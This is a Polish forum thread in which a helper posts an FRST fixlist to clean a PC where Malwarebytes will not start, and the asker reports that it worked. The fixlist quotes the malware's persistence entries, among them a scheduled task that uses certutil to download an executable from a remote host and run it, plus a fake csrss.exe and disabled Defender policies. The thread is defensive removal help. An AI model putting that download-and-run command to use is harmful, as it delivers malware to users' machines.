Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Malwarebytes niemożna odpalić

lolek90 10 Cze 2018 15:07 177 2
  • Pomocny post
    #2 10 Cze 2018 15:25
    krzychupar
    Poziom 41  

    Otwórz notatnik systemowy i wklej:

    ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => -> Brak pliku
    ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> Brak pliku
    ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> Brak pliku
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
    ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> Brak pliku
    Task: {4176E7F5-C4F3-4953-8527-2E47F8670C0E} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-09] () <==== UWAGA
    Task: {52EC8F46-19DD-48C5-9CCE-563B73191A1A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\Lenovo g580\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Lenovo g580\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {5F61E844-8B5D-4AB5-B09F-D94177DBA466} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe /NOUACCHECK
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-2969139517-2522067444-366879686-1001\...\Run: [HiddenWater] => C:\Windows\rss\csrss.exe [3115520 2018-06-09] () <==== UWAGA
    HKU\S-1-5-21-2969139517-2522067444-366879686-1001\...\Run: [CloudNet] => C:\Users\Lenovo g580\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-10] (EpicNet Inc.) <==== UWAGA
    HKU\S-1-5-21-2969139517-2522067444-366879686-1001\...\MountPoints2: {e10b279c-5d37-11e8-a188-201a069813e3} - "H:\HiSuiteDownLoader.exe"
    ShellExecuteHooks: Brak nazwy - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - -> Brak pliku
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    ProxyEnable: [S-1-5-21-2969139517-2522067444-366879686-1001] => Proxy [funkcja włączona]
    ProxyServer: [S-1-5-21-2969139517-2522067444-366879686-1001] => http=127.0.0.1:8080;https=127.0.0.1:8080
    ManualProxies: 1http=127.0.0.1:8080;https=127.0.0.1:8080
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKU\S-1-5-21-2969139517-2522067444-366879686-1001 -> DefaultScope {ielnksrch} URL =
    R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R2 WNetworkMgmt; C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe [6232185 2018-05-22] () [Brak podpisu cyfrowego] <==== UWAGA <==== UWAGA




    S2 ekrn; "C:\Program Files\ESET\ESET Security\ekrn.exe" [X]
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-09] () [Brak podpisu cyfrowego] <==== UWAGA
    S1 dqbtbaty; \??\C:\Windows\system32\drivers\dqbtbaty.sys [X]
    2018-06-09 21:27 - 2018-06-09 21:27 - 006989432 _____ (ESET spol. s r.o.) C:\Users\Lenovo g580\Downloads\esetonlinescanner_plk.exe
    2018-06-09 21:27 - 2018-06-09 21:27 - 000000000 ____D C:\Users\Lenovo g580\AppData\Local\ESET
    2018-06-09 21:22 - 2018-06-09 21:22 - 000000000 ____D C:\ProgramData\ESET
    2018-06-09 21:22 - 2018-06-09 21:22 - 000000000 ____D C:\Program Files\ESET
    2018-06-09 21:19 - 2018-06-09 21:20 - 004254840 _____ (ESET) C:\Users\Lenovo g580\Downloads\eset_nod32_antivirus_live_installer.exe
    2018-06-09 21:19 - 2018-06-09 21:19 - 004254328 _____ (ESET) C:\Users\Lenovo g580\Downloads\eset_internet_security_live_installer.exe
    2018-06-09 19:21 - 2018-06-09 19:22 - 000000000 ____D C:\AdwCleaner
    2018-06-09 19:14 - 2018-06-09 19:14 - 007627776 _____ () C:\Users\Lenovo g580\AppData\Local\agent.dat
    2018-06-09 19:14 - 2018-06-09 19:14 - 000070896 _____ () C:\Users\Lenovo g580\AppData\Local\Config.xml
    2018-06-09 19:13 - 2018-06-09 19:13 - 000140800 _____ () C:\Users\Lenovo g580\AppData\Local\installer.dat
    2018-06-09 19:14 - 2018-06-09 19:14 - 000005568 _____ () C:\Users\Lenovo g580\AppData\Local\md.xml
    2018-06-09 19:14 - 2018-06-09 19:14 - 000126464 _____ () C:\Users\Lenovo g580\AppData\Local\noah.dat
    2018-06-09 19:13 - 2018-06-09 19:18 - 000929792 _____ () C:\Users\Lenovo g580\AppData\Local\sham.db
    2018-06-09 19:15 - 2018-06-09 19:15 - 000032038 _____ () C:\Users\Lenovo g580\AppData\Local\uninstall_temp.ico
    2018-06-09 19:14 - 2018-06-09 19:14 - 001988789 _____ () C:\Users\Lenovo g580\AppData\Local\Zumdox.tst
    C:\Windows\rss\csrss.exe
    C:\Users\Lenovo g580\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #3 10 Cze 2018 15:52
    lolek90
    Poziom 2  

    Pomógł skrypt z posta osoby krzychupar która mi pomogła. Dziękuje :)

    0